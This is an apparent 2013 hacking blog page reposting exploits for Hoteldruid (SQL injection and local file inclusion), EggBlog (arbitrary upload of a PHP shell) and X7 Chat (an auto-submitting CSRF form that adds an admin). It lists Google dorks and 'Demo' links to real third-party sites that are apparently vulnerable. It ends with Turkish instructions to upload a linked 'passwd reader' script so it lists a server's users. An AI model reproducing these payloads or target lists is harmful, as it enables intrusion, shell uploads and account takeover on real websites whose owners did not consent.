14 Aralık 2013 Cumartesi

Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulenrabilities

+] Author: TUNISIAN CYBER
[+] Exploit Title:  Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulenrabilities
[+] Date: 14-12-2013
[+] Category: WebApp
[+] Vendor: http://www.hoteldruid.com/en/download.html
[+] Google Dork: inurl:"mostra_sorgente.php"
[+] Tested on: Win7 , ubuntu 13.04
  
  
########################################################################################
Description:
Hoteldruid is an open source program for hotel management (property management software) suffers from Local File Inclusion and SQL injection
 
I/LFI:
http://127.0.0.1/php-residence/mostra_sorgente.php?file_sorgente=[FILE]
 
II/SQLi:
http://127.0.0.1/php-residence/creaprezzi.php?anno=[YEAR]'
http://127.0.0.1/php-residence/messaggi.php?id_sessione=&anno=[YEAR]'
 
Fix:
Upgrade to v2.0.3
Demo:
 
http://www.hoteldruid.com/demo/mostra_sorgente.php?file_sorgente=clienti.php
https://lodginginspirational.com/mostra_sorgente.php?file_sorgente=clienti.php
http://www.at184.com/availability/mostra_sorgente.php?file_sorgente=/
http://www.pantelleriaest.com/hoteldruid/mostra_sorgente.php?file_sorgente=crea_backup.php
http://tbg.evolve2.org/mostra_sorgente.php?file_sorgente=themes/snj/php/menu.php

EggBlog v4.X.X Arbitrary File Upload vulnerability

########################################################################################
 
Site.ltd/[PaTh]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
Upload h4x3d.php.jpg/gif/png
Shell Path:
site.ltd/[PaTh]/photos/uploads/h4x3d.php.jpg
 
Demo:
www.thehenryvi.com/news
www.cn-blue.com
www.alrecenk.com/eggblog
sweetlyunique.net/blog
fucopuredietpills.com/eggblog/
www.mrcromwellsattic.com/blog/
elkarius.free.fr
########################################################################################

X7 CHAT 2.0.2 CSRF (add admin) vulenrability

+] Author: TUNISIAN CYBER
[+] Exploit Title:  X7 CHAT 2.0.2 CSRF Add Admin Vulenrability
[+] Date: 13-12-2013
[+] Category: WebApp
[+] Vendor:http://www.x7chat.com/‎
[+] Google Dork: Do Some Work and you'll find it :)
[+] Tested on: Win7 , ubuntu 13.04
  
  
########################################################################################
<html>
    <body onload="document.xform.submit();">
        <form name="xform" action="site.ltd/chat/index.php?act=adminpanel&cp_page=users&update=USER" method="post">
            <input type="hidden" name="username" value="USER" />
            <input type="hidden" name="usergroup" value="PASSWORD" />
        </form>
    </body>
</html>
 
Change USERNAME and PASSWORD
 
Demo:
http://www.ahleenarab.com/chat/
http://www.chat4u.eb2a.com/chat/
http://users.atw.hu/zenechat/chat/
http://www.zenechat.atw.hu/chat
http://filip.yw.sk/Chat/
########################################################################################

passwd Reader Beta2

Yukarıda Görmüş Olduğunuz Scripti .php diye kaydetin ve bir siteye yükleyin yükledikten sonra uzantısını nasıl kaydettiğseniz o şekilde giriniz. Karşınıza Serverdeki Sitelerin Userleri Gelicektir.

Link
http://gereklibilgiler.tk/reader2.txt